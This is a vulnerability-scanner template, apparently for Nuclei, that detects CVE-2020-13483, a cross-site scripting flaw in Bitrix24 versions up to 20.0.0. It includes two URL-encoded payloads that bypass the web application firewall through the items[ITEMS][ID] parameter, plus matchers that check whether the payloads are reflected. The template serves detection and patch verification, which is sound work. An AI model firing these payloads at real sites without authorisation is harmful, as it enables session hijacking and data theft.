id: CVE-2020-13483
info:
name: Bitrix24 <=20.0.0 - Cross-Site Scripting
author: pikpikcu,3th1c_yuk1
severity: medium
description: The Web Application Firewall in Bitrix24 up to and including 20.0.0 allows XSS via the items[ITEMS][ID] parameter to the components/bitrix/mobileapp.list/ajax.php/ URI.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
remediation: |
Upgrade to a patched version of Bitrix24 (version >20.0.0) to mitigate this vulnerability.
reference:
- https://gist.github.com/mariuszpoplwski/ca6258cf00c723184ebd2228ba81f558
- https://twitter.com/brutelogic/status/1483073170827628547
- https://nvd.nist.gov/vuln/detail/CVE-2020-13483
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2020-13483
cwe-id: CWE-79
epss-score: 0.00113
epss-percentile: 0.44613
cpe: cpe:2.3:a:bitrix24:bitrix24:*:*:*:*:*:*:*:*
metadata:
max-request: 2
vendor: bitrix24
product: bitrix24
tags: cve2020,cve,xss,bitrix,bitrix24
http:
- method: GET
path:
- '{{BaseURL}}/bitrix/components/bitrix/mobileapp.list/ajax.php/?=&AJAX_CALL=Y&items%5BITEMS%5D%5BBOTTOM%5D%5BLEFT%5D=&items%5BITEMS%5D%5BTOGGLABLE%5D=test123&=&items%5BITEMS%5D%5BID%5D=*/%29%7D%29;function+__MobileAppList()%7Balert(1)%7D//>'
- '{{BaseURL}}/bitrix/components/bitrix/mobileapp.list/ajax.php/?=&AJAX_CALL=Y&items%5BITEMS%5D%5BBOTTOM%5D%5BLEFT%5D=&items%5BITEMS%5D%5BTOGGLABLE%5D=test123&=&items%5BITEMS%5D%5BID%5D=%3Cimg+src=%22//%0d%0a)%3B//%22%22%3E%3Cdiv%3Ex%0d%0a%7D)%3Bvar+BX+=+window.BX%3Bwindow.BX+=+function(node,+bCache)%7B%7D%3BBX.ready+=+function(handler)%7B%7D%3Bfunction+__MobileAppList(test)%7Balert(document.domain)%3B%7D%3B//%3C/div%3E'
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- '*/)});function __MobileAppList(){alert(1)}//'
- "function(handler){};function __MobileAppList(test){alert(document.domain);};//"
condition: or
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
# digest: 4a0a0047304502202a2a07e609f8caed685b761ba01951c30fa18263d434c61f9e3a4e22ca861e41022100fa70983fe24c6aab2c9b4f3be6a814c578bf2f453df7b94a8ee3674f2a4b8db0:922c64590222798bb761d5b6d8e72950